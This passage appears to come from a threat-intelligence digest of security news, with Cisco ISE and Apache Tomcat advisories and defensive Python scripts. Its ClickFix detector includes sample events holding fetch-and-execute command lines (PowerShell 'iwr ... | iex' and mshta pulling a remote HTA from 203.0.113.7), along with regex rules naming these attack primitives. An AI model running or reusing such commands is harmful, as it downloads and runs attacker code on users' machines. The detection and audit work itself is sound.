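    {   # ClickFix-style: Run dialog -> hidden PowerShell fetching and iex-ing a payload
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://203.0.113.7/verify.txt | iex" '
                       '# I am not a robot - reCAPTCHA Verification ID: 7811',
    },
    {   # ClickFix-style: mshta pulling a remote HTA
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta http://203.0.113.7/captcha.hta",
    },
    {   # Benign: management agent running a signed inventory script
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\ConfigMgr\ccmexec.exe",
        "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    },
    {   # Benign: user ran a harmless command from the Run dialog
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "cmd /c dir",
    },
]

# Interactive launch (Win+R / File Explorer) is what makes a paste plausible.
INTERACTIVE_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}

# Each rule contributes one point; the final score is the number of rules hit.
RULES = [
    ("remote payload fetch", re.compile(r"(?i)\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b")),
    ("in-memory execution", re.compile(r"(?i)(\biex\b|invoke-expression|\|\s*cmd\b)")),
    ("hidden window / policy bypass", re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|-nop\b)")),
    ("url in command", re.compile(r"(?i)https?://")),
    ("CAPTCHA lure text", re.compile(r"(?i)(not a robot|captcha|verification id)")),
    ("mshta remote HTA", re.compile(r"(?i)\bmshta(\.exe)?\s+https?://")),
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict):
    """Return (score, matched rule names) for one process-creation event."""
    if basename(event["Image"]) not in INTERPRETERS:
        return 0, []
    if basename(event["ParentImage"]) not in INTERACTIVE_PARENTS:
        return 0, []
    reasons = [name for name, rx in RULES if rx.search(event["CommandLine"])]
    return len(reasons), reasons


def detect_clickfix(events, threshold: int = 2) -> list:
    """Flag events whose score reaches the threshold; two independent indicators
    (e.g. a URL plus an execution primitive) are required to cut down on admins
    pasting legitimate one-liners."""
    findings = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            findings.append({"image": basename(event["Image"]), "score": score,
                             "reasons": reasons, "command": event["CommandLine"]})
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"[{f['score']}] {f['image']}: {', '.join(f['reasons'])}\n    {f['command']}")
```

On Windows the same paste also lands in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so the registry artefact can corroborate a hit after the fact; the parent-process heuristic alone misses payloads pasted into an already-open terminal.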
https://slashnext.com/blog/decoding-clickfix-lessons-from-the-latest-browser-based-phish/
https://www.securityweek.com/clickfix-attack-exploits-fake-cloudflare-turnstile-to-deliver-malware/
- Unmasking Insecure HTTP Data Leaks In Popular Chrome Extensions
"Many users assume that popular Chrome extensions adhere to strong security practices, especially when the extensions themselves promise functionality related to privacy, ranking analytics, or convenient new tab features. However, recent findings show that several widely used extensions—SEMRush Rank, PI Rank, MSN New Tab/Homepage, DualSafe Password Manager, and Browsec VPN—unintentionally transmit sensitive data over simple HTTP. By doing so, they expose browsing domains, machine IDs, operating system details, usage analytics, and even uninstall information, in plaintext. Because the traffic is unencrypted, a Man-in-the-Middle (MITM) attacker on the same network can intercept and, in some cases, even modify this data, leading to far more dangerous scenarios than simple eavesdropping."
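The quickest way to check an installed extension for this class of leak is to unpack it and look for plaintext endpoints in its scripts and for http:// host permissions in its manifest. The following is an added example, not code from Symantec or from any of the extensions named: a small audit over a constructed extension (one manifest.json and one background.js, both invented for the example). Loopback URLs are excluded because local debug servers are a common and acceptable reason for http:// to appear.

```python
import json
import re

# Constructed extension package: file name -> contents. Invented for this example;
# example.net is a reserved documentation domain.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 3,
        "name": "Rank Helper",
        "host_permissions": ["http://*/*", "https://*/*"],
    }),
    "background.js": (
        'const mid = chrome.runtime.id;\n'
        'fetch("http://telemetry.example.net/collect?mid=" + mid + "&os=" + navigator.platform);\n'
        'fetch("https://api.example.net/rank?domain=" + location.hostname);\n'
        'fetch("http://127.0.0.1:8080/debug");\n'
    ),
}

URL_RE = re.compile(r"""https?://[^\s"'<>()]+""")
LOOPBACK_HOSTS = ("localhost", "127.0.0.1", "[::1]")


def audit_extension(files: dict) -> list:
    """Return findings for plaintext http:// endpoints in scripts and for
    http:// host permission patterns in the manifest."""
    findings = []
    for name, text in files.items():
        if name == "manifest.json":
            manifest = json.loads(text)
            patterns = manifest.get("host_permissions", []) + manifest.get("permissions", [])
            for perm in patterns:
                if perm.startswith("http://"):
                    findings.append({"file": name, "line": 0,
                                     "kind": "http host permission", "value": perm})
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            for url in URL_RE.findall(line):
                if not url.startswith("http://"):
                    continue  # https:// is what we want to see
                if url[len("http://"):].startswith(LOOPBACK_HOSTS):
                    continue  # local debug endpoints are not a network leak
                findings.append({"file": name, "line": lineno,
                                 "kind": "plaintext endpoint", "value": url})
    return findings


if __name__ == "__main__":
    for f in audit_extension(SAMPLE_EXTENSION):
        print(f"{f['file']}:{f['line']} {f['kind']}: {f['value']}")
```

String matching will miss URLs assembled at runtime, so treat a clean result as a prompt to confirm with a proxy capture rather than as a pass; conversely, an http:// host permission is only a risk if the extension actually makes requests to it.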
https://www.security.com/threat-intelligence/chrome-extension-leaks
https://thehackernews.com/2025/06/popular-chrome-extensions-leak-api-keys.html
- IBM X-Force Threat Analysis: DCRat Presence Growing In Latin America
"In early May 2025, IBM X-Force observed Hive0131 conducting email campaigns targeting users in Colombia with electronic notifications of criminal proceedings, purporting to be from The Judiciary of Colombia. Hive0131 is a financially motivated group likely originating from South America that routinely conducts campaigns largely in Latin America (LATAM) to deliver a wide array of commodity payloads. The current campaigns imitate official correspondence and contain either an embedded link or a PDF lure with an embedded link. Clicking on the embedded link will initiate the infection chain to execute the banking trojan "DCRat" in memory."
https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america
Breaches/Hacks/Leaks
- Over 3 Million Records, Including PII Exposed In App-Building Platform Data Breach
"Cybersecurity researcher Jeremiah Fowler discovered and reported to vpnMentor an unencrypted and non-password-protected database that contained 3,637,107 records that presumably belong to a no-code app-building platform."
https://www.vpnmentor.com/news/report-passionapps-breach/
https://hackread.com/unsecured-database-exposes-passion-io-creators-data/
General News
- The Cloud Security Crisis No One’s Talking About
"Security teams are overwhelmed by a flood of alerts, most of which lack the context needed to accurately assess and respond to threats, according to ARMO. Respondents report receiving an average of 4,080 security alerts per month – or 136 alerts per day – related to potential cloud-based attacks, with 61% handling between 1,001 and 5,000 alerts monthly. Yet despite this deluge, the average number of true security incidents per year is just 7, meaning it takes an average of 6,994 alerts to uncover one bona fide incident."
https://www.helpnetsecurity.com/2025/06/05/cloud-threats-detection/
- Google Survey Shows Americans Are Changing How They Fight Scams
"If it seems like scams are popping up everywhere lately, you’re not wrong. A new survey from Google shows most Americans feel the same, and they’re starting to change how they handle things online because of it. But different age groups are responding in different ways, and the tools people trust to stay safe vary more than you might expect."
https://www.helpnetsecurity.com/2025/06/05/google-survey-fight-scams/
- China Accuses Taiwan Of Running Five Feeble APT Gangs, With US Help
"Beijing complains it’s under relentless attack by the equivalent of an ant trying to shake a tree. China’s National Computer Virus Emergency Response Center on Thursday published a report in which it claims Taiwan targeted it with a years-long but feeble cyber offensive, backed by the USA. In a report [PDF] titled “Operation Futile: Investigation report on Cyberattacks launched by ICEFCOM of Taiwan and its affiliated [advanced persistent threat] APT actors”"
https://www.theregister.com/2025/06/05/china_taiwan_us_apt_report/
https://www.cverc.org.cn/head/zhaiyao/Investigation_report_on_Cyberattacks_launched_by_Taiwan_ICEFCOM_EN.pdf
https://www.securityweek.com/china-issues-warrants-for-alleged-taiwanese-hackers-and-bans-a-business-for-pro-independence-links/
- US Offers $10M For Tips On State Hackers Tied To RedLine Malware
"The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov. The same bounty covers leads on state hackers' use of this malware in cyber operations targeting critical infrastructure organizations in the United States."
https://www.bleepingcomputer.com/news/security/us-offers-10m-for-tips-on-state-hackers-tied-to-redline-malware/
https://rewardsforjustice.net/rewards/maxim-alexandrovich-rudometov-redline/
https://www.theregister.com/2025/06/05/rewards_for_justice_maxim_rudometov/
- ViLE Gang Members Sentenced For DEA Portal Breach, Extortion
"Two members of a group of cybercriminals named ViLE were sentenced this week for hacking into a federal law enforcement web portal in an extortion scheme. According to court documents, ViLE specializes in obtaining personal information about targets to harass, threaten, or extort them, a practice known as "doxing." To collect sensitive information on their victims, they use methods such as tricking customer service employees, submitting fraudulent legal requests to social media companies, bribing corporate insiders, and searching public and private online databases."
https://www.bleepingcomputer.com/news/security/vile-gang-members-sentenced-for-breaching-law-enforcement-portal/
https://www.securityweek.com/men-who-hacked-law-enforcement-database-for-doxing-sentenced-to-prison/
- SecOps Need To Tackle AI Hallucinations To Improve Accuracy
"While Artificial Intelligence (AI) benefits security operations (SecOps) by speeding up threat detection and response processes, hallucinations can generate false alerts and lead teams on a wild goose chase. AI hallucinations, which largely affect large language models (LLMs), produce incorrect, misleading, or biased information. However, unsuspecting users may accept those responses as legitimate and confidently make decisions based on them. Many examples of AI hallucinations exist, such as made-up law cases in legal filings, fictional book titles, and non-existent research studies. AI experts have repeatedly warned about the effect hallucinations can have, whether they are average users running casual ChatGPT queries or skilled developers using AI to write code."
https://www.darkreading.com/vulnerabilities-threats/secops-tackle-ai-hallucinations-improve-accuracy
- Sticky Fingers In The Cookie Jar: Research Reveals The Risks Of Web Cookies
"Most of us barely pause before clicking away the cookie consent banner. It’s a routine, a forgettable part of using the internet, meant to make our online lives easier. After all, the internet is built on convenience. But that convenience has a cost, and that cost is often paid in the form of your data. In our latest study, researchers from NordStellar, a threat exposure management platform, analyzed a set of 93.7 billion cookies circulating on the dark web to uncover how they were stolen and what risks they pose. Read on and learn what that means for your privacy and security and what you can do to protect yourself."
https://nordvpn.com/blog/cookies-research/
https://hackread.com/nearly-94-billion-stolen-cookies-on-dark-web/
- #Infosec2025: Cybersecurity Lessons From Maersk’s Former CISO
"The 2017 ransomware attack on shipping company A P Moller Maersk marked a turning point for the cybersecurity industry, according to its former CISO Adam Banks. The attack is estimated to have cost Maersk $700m, excluding any revenue losses. Following the attack, it was three months before the business was fully back online, Banks told an audience at Infosecurity Europe 2025. But, he said, it could well have been worse. The $700m figure was, Banks said, the cost of the attack and the recovery. A stroke of luck, in the form of a power cut in Lagos, cut the firm’s recovery time by as much as four weeks."
https://www.infosecurity-magazine.com/news/infosec2025-lessons-maersk-ciso/
- #Infosec2025: Ransomware Victims Urged To Engage To Take Back Control
"Opening lines of communication with ransomware actors is the best way to deliver a positive outcome from an event that will be “the worst day of the IT team’s lives,” a leading negotiator has claimed. Dan Saunders, director of incident response EMEA at Kivu Consulting, revealed that just 30% of the firm’s negotiations with threat actors over the past year have actually led to the victim paying. “There’s a common misconception around engaging threat actors and that is if ‘we’re going to engage them, we’re going to reach a financial settlement.’ But that is not the case,” he said."
https://www.infosecurity-magazine.com/news/infosec2025-ransomware-victims/
- #Infosec2025: Know Your Audience To Make An Impact, CISOs Tell Their Peers
"Security leaders must focus and adapt their message to their audience if they are to successfully use risk management to tame a chaotic cyber landscape, a panel of CISOs has argued. On the final day of Infosecurity Europe, security bosses from across LexisNexis and RX Global discussed how CISOs play a vital role as business enablers, and “translators” of risk for senior leadership. This role has added importance given a landscape in which AI-driven threats, insider risk, growing business demands and fast-evolving technology proliferate."
https://www.infosecurity-magazine.com/news/infosec2025-know-your-audience/
- #Infosec2025: Threat Actors Weaponizing Hardware Devices To Exploit Fortified Environments
"Threat actors are weaponizing legitimate hardware devices to compromise even the most fortified targets, warned Bentsi Benatar, CMO and Co-Founder of Sepio during a talk at Infosecurity Europe 2025. Despite a lack of reporting of such incidents, this approach is being utilized by sophisticated nation-state and financially motivated attackers to target sensitive targets such as banks and energy carriers."
https://www.infosecurity-magazine.com/news/threat-actors-weaponizing-hardware/
- #Infosec2025: Defenders And Attackers Are Locked In An AI Arms Race
"Malicious actors are using AI tools to fine-tune cyber-attacks, even as governments race to encourage AI investment. National programs to bolster AI expertise and R&D should be seen in the context of the growing use of AI tools by criminal hackers, advised Brett Taylor, UK sales engineering director at SentinelOne, in his talk at Infosecurity Europe 2025. Just as enterprises and public-sector bodies are looking to AI to improve productivity and drive economic growth, so criminal groups are using AI-based tools to develop malware and find vulnerabilities. Additionally, hackers are actively looking for any weak spots in AI deployments."
https://www.infosecurity-magazine.com/news/infosec2025-arms-race-ai/
- #Infosec2025: Seven Steps To Building a Mature Vulnerability Management Program
"For the past two years, cybersecurity teams have been facing an explosion of publicly reported vulnerabilities in software and hardware products, making it increasingly challenging to prioritize patch management. Speaking at Infosecurity Europe 2025, Jon Ridyard, Senior Sales Engineer at Axonius, proposed seven best practices for building mature vulnerability management processes and avoiding burnout."
https://www.infosecurity-magazine.com/news/infosec2025-seven-steps/
- #Infosec2025: Securing Endpoints Is Still Vital Amid Changing Threats
"Endpoint devices, including PCs, mobile phones and connected IoT equipment continue to pose security risks, even as malicious actors ramp up their attacks on other areas of enterprise technology. Endpoint security might be less of a focus for CISOs struggling with a growing attack surface and increasingly sophisticated malicious actors harnessing AI tools and weaknesses in supply chain security. However, endpoints and networks remain critical layers of IT infrastructure that organizations still need to protect."
https://www.infosecurity-magazine.com/news/infosec2025-securing-endpoints/
- IT Threat Evolution In Q1 2025
"According to Kaspersky Security Network, in the first quarter of 2025: A total of 12 million attacks on mobile devices involving malware, adware, or unwanted apps were blocked. Trojans, the most common mobile threat, accounted for 39.56% of total detected threats. More than 180,000 malicious and potentially unwanted installation packages were detected, which included: 49,273 packages related to mobile bankers and 1520 mobile ransomware Trojans."
https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/
https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/
Reference
Electronic Transactions Development Agency (ETDA)
- Healthcare Organizations Are At a Turning Point With AI
-
Critical vulnerability in Cisco ISE
On 6 June 2025 the Cyber Security Agency of Singapore (CSA) reported that Cisco has released security updates to address a critical vulnerability (CVE-2025-20286) in Cisco Identity Services Engine (ISE).
The vulnerability is rated critical with a CVSS v3.1 score of 9.9, and proof-of-concept exploit code is reported to be publicly available.
Impact
Successful exploitation could allow an unauthenticated, remote attacker to:
- access sensitive data
- perform limited administrative operations
- modify system configuration
- or disrupt services on the affected system
Affected products
The vulnerability affects Cisco ISE deployed with the default configuration on the following cloud platforms:
- AWS: Cisco ISE releases 3.1, 3.2, 3.3 and 3.4
- Azure: Cisco ISE releases 3.2, 3.3 and 3.4
- OCI (Oracle Cloud Infrastructure): Cisco ISE releases 3.2, 3.3 and 3.4
Remediation
Affected users and administrators are advised to update to the latest release immediately. Where that is not immediately possible, apply the following mitigation:
Restrict access to the Cisco ISE instance with cloud-platform security groups that allow only the source IP addresses of pre-approved administrators. This blocks connections from any other, potentially malicious, source.
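As an added illustration of that mitigation (example code written for this post, not Cisco's or CSA's), the Python below audits a security-group ingress list for any source that is not inside an administrator allow-list, and builds the replacement rules. The rule shape mirrors the IpPermissions list returned by `aws ec2 describe-security-groups`; the sample rules, the allow-list addresses (RFC 5737/3849 documentation space) and the port numbers are constructed for the example. The same (protocol, port range, source CIDR) check applies to Azure network security groups and OCI security lists once their rules are read into the same shape.

```python
import ipaddress
from typing import Iterable

# Assumed allow-list of administrator source ranges (documentation address space).
ADMIN_SOURCES = ("203.0.113.0/24", "198.51.100.10/32", "2001:db8:1::/48")

# Constructed sample in the shape of the IpPermissions list returned by
# `aws ec2 describe-security-groups`; it is not taken from any real deployment.
SAMPLE_INGRESS = [
    # HTTPS admin portal open to the whole IPv4 internet: the weak setting
    {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
     "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
    # SSH limited to the admin network: fine
    {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
     "IpRanges": [{"CidrIp": "203.0.113.0/24"}], "Ipv6Ranges": []},
    # "All traffic" rule; AWS omits the port fields for protocol -1
    {"IpProtocol": "-1",
     "IpRanges": [{"CidrIp": "198.51.100.10/32"}],
     "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
    # HTTPS from the admin IPv6 prefix only: fine
    {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
     "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "2001:db8:1::/48"}]},
]


def _allowed(cidr: str, admin_nets) -> bool:
    """True if every address in `cidr` lies inside one allow-listed admin network."""
    net = ipaddress.ip_network(cidr, strict=False)
    # subnet_of() raises on mixed IP versions, so compare versions first.
    return any(net.version == a.version and net.subnet_of(a) for a in admin_nets)


def find_unrestricted_ingress(rules, admin_sources=ADMIN_SOURCES):
    """Return (protocol, from_port, to_port, cidr) for every source CIDR in the
    ingress rules that is not fully covered by the admin allow-list."""
    admin_nets = [ipaddress.ip_network(s) for s in admin_sources]
    findings = []
    for rule in rules:
        proto = rule.get("IpProtocol", "-1")
        # Protocol "-1" means all traffic on all ports.
        lo = rule.get("FromPort", 0) if proto != "-1" else 0
        hi = rule.get("ToPort", 65535) if proto != "-1" else 65535
        sources = [r["CidrIp"] for r in rule.get("IpRanges", [])]
        sources += [r["CidrIpv6"] for r in rule.get("Ipv6Ranges", [])]
        for cidr in sources:
            if not _allowed(cidr, admin_nets):
                findings.append((proto, lo, hi, cidr))
    return findings


def restricted_ingress(ports: Iterable[int], admin_sources=ADMIN_SOURCES):
    """Build the corrected IpPermissions: one TCP rule per management port,
    with sources limited to the admin allow-list (no 0.0.0.0/0 or ::/0)."""
    v4 = [{"CidrIp": s} for s in admin_sources if ipaddress.ip_network(s).version == 4]
    v6 = [{"CidrIpv6": s} for s in admin_sources if ipaddress.ip_network(s).version == 6]
    return [{"IpProtocol": "tcp", "FromPort": p, "ToPort": p, "IpRanges": v4, "Ipv6Ranges": v6}
            for p in sorted(set(ports))]


if __name__ == "__main__":
    for finding in find_unrestricted_ingress(SAMPLE_INGRESS):
        print("exposed:", finding)
    # Ports are an assumption for the example; use the ports your ISE deployment actually serves.
    print("replacement rules:", restricted_ingress([443, 22]))
```

Run it against the real output of `describe-security-groups` by loading the JSON and passing each group's `IpPermissions` list; an empty result means every ingress source sits inside the allow-list, which is what the advisory's interim mitigation asks for.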
Reference
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-057/
You can follow news on the webboard or the NCSA Thailand Facebook page
-
High-severity vulnerability in the Apache Tomcat CGI Servlet
On 6 June 2025 the Cyber Security Agency of Singapore (CSA) reported that the Apache Software Foundation has released security updates to address a high-severity vulnerability (CVE-2025-46701) in the Common Gateway Interface (CGI) Servlet of Apache Tomcat.
Impact
If successfully exploited, an attacker could use a specially crafted URL to bypass the configured security constraints and gain unauthorised access to restricted CGI resources.
The vulnerability affects the following products:
- Apache Tomcat 11.0.0-M1 to 11.0.6
- Apache Tomcat 10.1.0-M1 to 10.1.40
- Apache Tomcat 9.0.0.M1 to 9.0.104
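An added Python check (written for this post, not from the advisory or the Tomcat project) that tests an installed version against the three ranges listed above. Tomcat milestone builds carry an M suffix, written "11.0.0-M1" in newer branches and "9.0.0.M1" in the 9.0 branch, and a milestone must sort before the GA release with the same number, so a plain string comparison gets the range boundaries wrong. The `extract_version` helper pulls the version out of the "Apache Tomcat/x.y.z" string that `bin/version.sh` prints; the sample output is constructed. Two caveats: a version outside the three ranges is reported as not listed, not as safe (the advisory does not cover other branches), and the CGI servlet is commented out in Tomcat's stock conf/web.xml, so only installations that enabled it expose this code path.

```python
import re

# Affected ranges (inclusive) exactly as listed in the CSA advisory.
AFFECTED_RANGES = [
    ("11.0.0-M1", "11.0.6"),
    ("10.1.0-M1", "10.1.40"),
    ("9.0.0.M1", "9.0.104"),
]

# Accepts "9.0.104", "11.0.0-M1" and the older "9.0.0.M1" milestone spelling.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[.-]M(\d+))?$")


def version_key(version: str) -> tuple:
    """Sortable key for a Tomcat version; milestone builds order before the
    GA release carrying the same major.minor.patch number."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {version!r}")
    major, minor, patch, milestone = m.groups()
    stage = (0, int(milestone)) if milestone else (1, 0)
    return (int(major), int(minor), int(patch)) + stage


def is_affected(version: str) -> bool:
    """True if `version` falls inside one of the advisory's affected ranges.
    False only means the version is not in a listed range, not that it is safe."""
    key = version_key(version)
    return any(version_key(lo) <= key <= version_key(hi) for lo, hi in AFFECTED_RANGES)


def extract_version(text: str):
    """Pull the version from text such as 'Server version: Apache Tomcat/9.0.104'
    (the first line printed by bin/version.sh). Returns None if absent."""
    m = re.search(r"Apache Tomcat/(\d+\.\d+\.\d+(?:[.-]M\d+)?)", text)
    return m.group(1) if m else None


if __name__ == "__main__":
    # Constructed sample of version.sh output; not captured from a real host.
    sample = "Server version: Apache Tomcat/9.0.104\nServer built:   (constructed)\n"
    found = extract_version(sample)
    print(found, "affected" if is_affected(found) else "not in listed ranges")
```

Feed it the first line of `bin/version.sh` (or `bin\version.bat`) from each host; a hit on a server whose conf/web.xml has the CGI servlet and its `/cgi-bin/*` mapping uncommented is the one that needs the upgrade first.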
Remediation
Users and administrators of the affected products are advised to update to the latest version immediately.
Reference
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-056/
-
Critical vulnerability found in Roundcube Webmail, hidden for more than 10 years, puts systems at risk of takeover
-
Ukraine arrests hacker who hijacked more than 5,000 hosting accounts to mine cryptocurrency
-
Cyber Threat Intelligence 05 June 2025
Energy Sector
- The Future Of Cybersecurity Standards For Global Federal Energy Systems
"According to a report, 71% of energy industry professionals consider their organizations more vulnerable to OT cyber events than ever. These are private organizations, but the stakes are much higher for government-owned systems. Government-owned energy systems such as national grids, nuclear facilities, pipelines, and strategic reserves are foundational to national sovereignty and public welfare."
https://www.tripwire.com/state-of-security/future-cybersecurity-standards-global-federal-energy-systems
Industrial Sector
- Ramnit Malware Infections Spike In OT As Evidence Suggests ICS Shift
"Industrial giant Honeywell on Wednesday published its 2025 Cybersecurity Threat Report, which shows that ransomware and other malware attacks have surged in the industrial sector. Honeywell’s report shows — based on OSINT and industry sources — that there has been a significant increase in ransomware attacks on industrial organizations. While these attacks did not necessarily impact operational technology (OT) systems, more than half of the 55 cybersecurity incidents reported to the SEC in 2024 did affect OT."
https://www.securityweek.com/ramnit-malware-infections-spike-in-ot-as-evidence-suggests-ics-shift/
https://www.honeywell.com/content/dam/honeywellbt/en/documents/gated/hon-corp-honeywell-2025-cyber-threat-report.pdf
Vulnerabilities
- Cisco Warns Of ISE And CCP Flaws With Public Exploit Code
"Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions. The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity's Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments. The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments."
https://www.bleepingcomputer.com/news/security/cisco-warns-of-ise-and-ccp-flaws-with-public-exploit-code/
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-aws-static-cred-FPMjUcm7
- CISA Adds Three Known Exploited Vulnerabilities To Catalog
"CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-21479 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability
CVE-2025-21480 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability
CVE-2025-27038 Qualcomm Multiple Chipsets Use-After-Free Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/06/03/cisa-adds-three-known-exploited-vulnerabilities-catalog
https://securityaffairs.com/178610/hacking/u-s-cisa-adds-multiple-qualcomm-chipsets-flaws-to-its-known-exploited-vulnerabilities-catalog.html
Malware
- Updated Guidance On Play Ransomware
"CISA, the Federal Bureau of Investigation (FBI), and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) have issued an updated advisory on Play ransomware, also known as Playcrypt. This advisory highlights new tactics, techniques, and procedures used by the Play ransomware group and provides updated indicators of compromise (IOCs) to enhance threat detection."
https://www.cisa.gov/news-events/alerts/2025/06/04/updated-guidance-play-ransomware
https://www.bleepingcomputer.com/news/security/fbi-play-ransomware-breached-900-victims-including-critical-orgs/
https://www.theregister.com/2025/06/04/play_ransomware_infects_900_victims/
- ViperSoftX Stealing Cryptocurrencies
"AhnLab SEcurity intelligence Center (ASEC) has confirmed that the ViperSoftX attacker is continuously distributing malware to users in Korea. ViperSoftX is a type of malware that resides in infected systems and is responsible for executing threat actors’ commands and stealing cryptocurrencies. ASEC previously published an analysis of a ViperSoftX attack case in May 2024, which covered a distribution case of TesseractStealer, a malware that utilizes Quasar RAT, a remote access Trojan, and Tesseract, an open-source OCR engine that uses deep learning."
https://asec.ahnlab.com/en/88336/
- FBI Warns Of NFT Airdrop Scams Targeting Hedera Hashgraph Wallets
"The FBI is warning about a new scam where cybercriminals exploit NFT airdrops on the Hedera Hashgraph network to steal crypto from cryptocurrency wallets. Airdrops are a method of distributing cryptocurrency tokens for free to wallet addresses, usually as part of a marketing, community growth, or reward campaign, but they are also used as bait for scams. "The Hedera Hashgraph is the distributed ledger used by Hedera. The airdrop feature was originally created by the Hedera Hashgraph network for marketing purposes; however, cyber criminals can exploit this tactic to collect victim data to steal cryptocurrency," explains the FBI advisory."
https://www.bleepingcomputer.com/news/security/fbi-warns-of-nft-airdrop-scams-targeting-hedera-hashgraph-wallets/
https://www.ic3.gov/PSA/2025/PSA250603
- The Cost Of a Call: From Voice Phishing To Data Extortion
"Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing) campaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion. Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements."
https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion
https://www.bleepingcomputer.com/news/security/google-hackers-target-salesforce-accounts-in-data-extortion-attacks/
https://www.darkreading.com/application-security/vishing-crew-salesforce-data
https://thehackernews.com/2025/06/google-exposes-vishing-group-unc6040.html
https://therecord.media/google-warns-cybercriminals-targeting-salesforce-apps
https://www.securityweek.com/google-warns-of-vishing-extortion-campaign-targeting-salesforce-customers/
https://cyberscoop.com/google-unc6040-salesforce-attacks/
https://www.helpnetsecurity.com/2025/06/04/salesforce-vishing-attacks/
https://www.theregister.com/2025/06/04/fake_it_support_calls_hit/
- ClickFix Campaign Spoofs Booking.com For Malware Delivery
"Over the past few months, Cofense Intelligence has been tracking a series of travel assistance-themed, Booking.com-spoofing emails targeting hotel chains within the accommodation and food services sector. These campaigns are notable for delivering a wide variety of remote access trojans (RATs) or information stealers via an embedded link to a fake CAPTCHA site that delivers a malicious script instead of a verification code. The website will prompt the user to run the malicious script using Windows keyboard shortcuts."
https://cofense.com/blog/clickfix-campaign-spoofs-booking-com-for-malware-delivery
https://www.infosecurity-magazine.com/news/phishing-fake-bookingcom-emails/
- The Bitter End: Unraveling Eight Years Of Espionage Antics—Part One
"TA397 (Bitter) is an espionage group with a long history of targeting South Asian entities. While the group is frequently attributed to India (non-publicly), the reasoning behind this is not clearly documented. In this blog we share evidence showing TA397 to be an India-aligned threat actor and release previously undisclosed evidence of the group’s targeting outside of Asia. In part one of this blog series, we explore TA397’s campaigns, targeting, and payload delivery and conduct an in-depth analysis of TA397’s infrastructure. Part two of this blog series expands on this research with a deep dive into TA397’s entire observed malware arsenal, highlighting how the group’s capabilities support its espionage operations."
https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one
https://www.threatray.com/blog/the-bitter-end-unraveling-eight-years-of-espionage-antics-part-two
- From Open-Source To Open Threat: Tracking Chaos RAT’s Evolution
"Chaos RAT is an open-source RAT written in Golang, offering cross-platform support for both Windows and Linux systems. Inspired by popular frameworks such as Cobalt Strike and Sliver, Chaos RAT provides an administrative panel where users can build payloads, establish sessions and control compromised machines. While Golang-based malware tends to be slower and of larger size when compared to those written in C++ or other common languages, it benefits from Golang's cross-compilation capabilities, resulting in reduced development time and greater flexibility."
https://www.acronis.com/en-us/cyber-protection-center/posts/from-open-source-to-open-threat-tracking-chaos-rats-evolution/
https://thehackernews.com/2025/06/chaos-rat-malware-targets-windows-and.html
- The Strange Tale Of Ischhfd83: When Cybercriminals Eat Their Own
